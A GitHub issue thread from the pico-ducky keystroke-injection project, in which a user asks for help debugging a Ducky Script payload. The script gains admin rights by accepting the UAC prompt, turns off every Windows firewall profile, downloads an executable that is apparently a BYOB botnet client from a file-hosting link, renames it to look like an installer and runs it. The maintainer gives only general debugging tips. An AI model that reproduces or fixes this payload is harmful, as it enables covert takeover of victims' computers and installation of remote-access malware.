dbisu/pico-ducky #78: User Account Control doesn't work

SinSinati5, 2022-06-24:
this is my code: 
`
REM Author : Sina Aghily
DELAY 2000
GUI  r
DELAY 1000
STRING powershell 
CTRL SHIFT ENTER
DELAY 2000
ALT y
DELAY 3000
STRING netsh advfirewall set allprofiles state off 
ENTER 
DELAY 3000
GUI  r
DELAY 1000
STRING powershell 
ENTER
DELAY 2000
STRING cd Downloads
ENTER
DELAY 1500
STRING curl https://download1083.mediafire.com/cbgo8rvi85dg/azsjpephk3ougi3/byob_win_x32_a5y+%281%29.exe -O installer_1.2.4.exe
ENTER
DELAY 15000
STRING start installer_1.2.4.exe
ENTER
DELAY 2000
ALT y
DELAY 3000
ENTER
`

everything works perfect until I get to the start command and it gives me the unknown publisher command. no command works there and I have checked that my command is right by inputting it myself and it worked. I also made the delays longer thinking it did the command before the prompt but still the same issue.

thankyou in advance

dbisu, 2022-06-26:
I think this issue is outside the scope of this project.  Let's see if we can debug it anyway.
Have you tried manually running all of the commands in the script in the order presented in the script?

SinSinati5, 2022-06-27:
Yes, it works until then and I tried doing the command with the keyboard myself and it worked. I also tried LEFT and ENTER as an alternative but it still didn't work through the pico

dbisu, 2022-07-07:
I'm not really sure what is happening.
Have you tried adding the script line by line to see where it behaves differently?

SinSinati5, 2022-07-10:
I will try that and get back

dbisu, 2022-09-18:
Closing, no activity.

closed 2022-09-18 by dbisu